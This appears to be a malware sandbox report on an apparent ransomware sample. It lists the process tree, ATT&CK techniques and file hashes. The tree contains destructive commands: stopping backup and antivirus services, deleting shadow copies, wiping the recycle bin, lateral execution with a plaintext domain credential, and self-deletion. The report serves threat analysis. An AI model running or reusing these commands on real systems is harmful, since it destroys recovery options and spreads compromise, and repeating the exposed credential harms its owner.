- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:2496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:3212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:4304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:2992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:6228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:2252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:2748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:4028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:6188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:6180
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:2816
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:4640
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:2864
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:3744
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3348
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:884
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2940
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5072
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4828
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3244
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5040
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3080
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4860
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3792
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4200
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4548
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1996
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1968
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2264
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:4852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.0.79 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:6708
- C:\Users\Admin\AppData\Local\Temp\0zwwleoe.exe
  "C:\Users\Admin\AppData\Local\Temp\0zwwleoe.exe" \10.127.0.79 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:6932
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:7000
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:6288
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2960
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5856
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
  2⤵
  PID:3464
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3752 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
1⤵
PID:5840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0zwwleoe.exe

Filesize
219KB

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5gq203s.g1u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

Filesize
1KB

MD5
2a8e97d5b8534f2c1f28767ea72e523e

SHA1
3ae2caa8ccc5352a117291435779b43ffd2dc064

SHA256
46e67aeb265b9fbe6ba5e46654dfb3691abf5317ad720de3d8e316eefc909a49

SHA512
7cc01d96beeccd09a5c7ee129cab75133f488bd8e42afb63b47d9999a028de03aa704aec755408c73024d116b991dac5bf7c3cc0b69388f8a1b459c543cb78e9

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
446B

MD5
5abf6d7db147ead33ff2b5266286db14

SHA1
60d5ac017fdcfc009b379675c11d3eef806b0e3d

SHA256
6323295633d288f56c44b2001c21a124a17277261c863c6cdd0463f158d0dab3

SHA512
6223dcaf2d319f95cbc61dc5f30fc0b7ef284bf5ab5366656b8ad915a44117077aedd558c70f9321f14297527a48a24f4825761a8183a940318610f6a08ba8cd

Download Submit
memory/2992-4-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/2992-15-0x000001A4DDFC0000-0x000001A4DDFE2000-memory.dmp

Filesize
136KB

Download
memory/2992-16-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/2992-17-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/2992-20-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/2992-3-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/4416-0-0x00007FF9D5CB3000-0x00007FF9D5CB5000-memory.dmp

Filesize
8KB

Download
memory/4416-70-0x00007FF9D5CB3000-0x00007FF9D5CB5000-memory.dmp

Filesize
8KB

Download
memory/4416-2-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/4416-133-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/4416-1-0x0000000000140000-0x000000000015C000-memory.dmp

Filesize
112KB

Download
memory/4416-144-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download